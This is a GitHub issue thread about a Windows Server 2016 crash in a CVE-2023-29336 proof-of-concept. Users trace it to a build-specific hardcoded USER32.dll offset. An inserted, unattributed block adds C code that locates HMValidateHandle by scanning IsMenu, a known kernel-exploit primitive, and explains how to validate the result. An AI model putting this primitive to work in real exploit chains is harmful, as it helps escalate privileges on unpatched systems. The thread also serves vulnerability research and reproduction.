
Runtime Error with CVE-2023-29336 PoC On Windows 2016 Standard

Open gwillcox-r7 opened this issue 1 year ago • 4 comments

When running the PoC on a fresh Windows 2016 updated with Feb 2018 patches, I keep getting the following error when trying to run the PoC via a Visual Studio 2022 project:

Exception thrown at <address> in CVE-2023-29336.exe: 0xC00000005: Access violation reading location 0xFFFFFFFFFFFFFFFF

Yet looking at where add is I see it's a variable that is seemingly pointing to invalid memory that cannot be read from:

[image]

gwillcox-r7 avatar Jun 09 '23 18:06 gwillcox-r7

Upon further inspection this is likely being caused by the fact that hardcoded offsets into USER32.dll are being used and I'm guessing 0xbd688 isn't right for Windows Server 2016 EN_US edition. It's possible this might be different on a Chinese or Singaporean system, which would explain why this code might work on the author's PC but not on a US system due to strings being encoded in different languages, which might end up changing the offset location, or it might be that I'm simply using a different patch version of USER32.dll where a minor update to the code shifted the offset location. In any case I imagine this file could be subject to change from a few angles; will dig deeper and see what I can find.

gwillcox-r7 avatar Jun 12 '23 21:06 gwillcox-r7

Looks like this was designed to be getting the address of HMValidateHandle using a common technique, though the use of a hardcoded address vs checking for specific bytes is a bit different than what I've seen in the past. In reality in my copy the address of IsMenu is at 0x180012b10 whilst the address of HMValidateHandle is at 0x180012100. So HMValidateHandle is actually earlier on in the code, not later on in the code like the code appears to be trying to do.

gwillcox-r7 avatar Jun 12 '23 22:06 gwillcox-r7
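The resolution technique discussed in the comment above, as an added example that is not code from the CVE-2023-29336 PoC or from anyone in this thread: instead of a hardcoded USER32 offset such as 0xbd688, resolve HMValidateHandle at runtime by taking the exported IsMenu and following the first `call rel32` (opcode 0xE8) in its body. Because the displacement is a signed rel32, this works whether HMValidateHandle sits before or after IsMenu in .text, which is exactly the case reported above (IsMenu at 0x180012b10, HMValidateHandle at 0x180012100). The sample instruction bytes are constructed for the test and merely modelled on the x64 IsMenu prologue (`mov edx, 4; call HMValidateHandle`), the two addresses are the ones quoted in the comment, and the `HMValidateHandle` prototype and the Windows-only helper are the commonly cited form, not something verified against this PoC; all of these are assumptions.

```c
/* Added example: locate HMValidateHandle by scanning IsMenu for its first
 * CALL rel32 instead of trusting a build-specific hardcoded offset.
 * The scanner is portable C so it can be exercised on any host; the part that
 * actually touches user32.dll is compiled only on Windows. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Scan `code` (len bytes, loaded at virtual address `base`) for the first
 * E8 <rel32> (CALL rel32) and return the call target, or 0 if no call is
 * found within `max_scan` bytes.  Target = address of the next instruction
 * (offset of E8 + 5) + sign-extended rel32, so a negative displacement
 * correctly reaches a callee placed earlier in the image. */
uint64_t find_first_call_target(const uint8_t *code, size_t len,
                                uint64_t base, size_t max_scan)
{
    size_t limit = len < max_scan ? len : max_scan;
    for (size_t i = 0; i + 5 <= limit; i++) {
        if (code[i] == 0xE8) {
            int32_t rel;
            memcpy(&rel, code + i + 1, sizeof rel);   /* little-endian rel32 */
            return base + (uint64_t)i + 5 + (uint64_t)(int64_t)rel;
        }
    }
    return 0;
}

/* Constructed sample (assumption, not bytes dumped from any real user32.dll):
 * sub rsp,28h ; mov edx,4 ; call rel32 ; add rsp,28h ; ret
 * The rel32 (0xFFFFF5E2 = -2590) is chosen so that, with IsMenu at
 * 0x180012b10 as reported in this issue, the target is 0x180012100, i.e.
 * HMValidateHandle lies *before* IsMenu. */
static const uint8_t k_sample_is_menu[] = {
    0x48, 0x83, 0xEC, 0x28,             /* sub rsp, 28h            */
    0xBA, 0x04, 0x00, 0x00, 0x00,       /* mov edx, 4              */
    0xE8, 0xE2, 0xF5, 0xFF, 0xFF,       /* call -2590              */
    0x48, 0x83, 0xC4, 0x28,             /* add rsp, 28h            */
    0xC3                                /* ret                     */
};
#define K_SAMPLE_IS_MENU_BASE 0x180012b10ULL

/* Resolve against the constructed sample; returns 0x180012100 for the bytes above. */
uint64_t demo_resolve_from_sample(void)
{
    return find_first_call_target(k_sample_is_menu, sizeof k_sample_is_menu,
                                  K_SAMPLE_IS_MENU_BASE, 0x1000);
}

#ifdef _WIN32
/* Commonly cited prototype (assumption): HMValidateHandle(HANDLE h, BYTE type). */
typedef void *(*HMValidateHandle_t)(HANDLE h, BYTE type);

/* Real resolution on Windows: scan up to 0x1000 bytes of the live IsMenu. */
HMValidateHandle_t resolve_hmvalidatehandle(void)
{
    HMODULE user32 = LoadLibraryA("user32.dll");
    if (!user32) return NULL;
    const uint8_t *is_menu = (const uint8_t *)GetProcAddress(user32, "IsMenu");
    if (!is_menu) return NULL;
    uint64_t target = find_first_call_target(is_menu, 0x1000,
                                             (uint64_t)(uintptr_t)is_menu, 0x1000);
    return (HMValidateHandle_t)(uintptr_t)target;
}

int main(void)
{
    HMValidateHandle_t fn = resolve_hmvalidatehandle();
    printf("IsMenu-derived HMValidateHandle: %p\n", (void *)fn);
    return fn ? 0 : 1;
}
#endif
```

On a real system, sanity-check the resolved pointer before calling it: it must lie inside user32.dll's .text section, and calling it with a bogus handle and a known type (e.g. TYPE_WINDOW) should return NULL rather than crash. A hardcoded offset gives no such opportunity, which is why builds like 14393.rs1_release.161220-1747 fail with the access violation reported here.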

Okay so turns out the PoC is only designed to work on 14393.rs1_release.230329-2152 and I was testing on 14393.rs1_release.161220-1747 from what I can tell, which explains the differences.

gwillcox-r7 avatar Jun 13 '23 21:06 gwillcox-r7

> When running the PoC on a fresh Windows 2016 updated with Feb 2018 patches, I keep getting the following error when trying to run the PoC via a Visual Studio 2022 project:
>
> Exception thrown at <address> in CVE-2023-29336.exe: 0xC00000005: Access violation reading location 0xFFFFFFFFFFFFFFFF
>
> Yet looking at where add is I see it's a variable that is seemingly pointing to invalid memory that cannot be read from:
>
> [image]

I also encountered this problem. And, have you solved it?

leexuan avatar Jul 17 '23 13:07 leexuan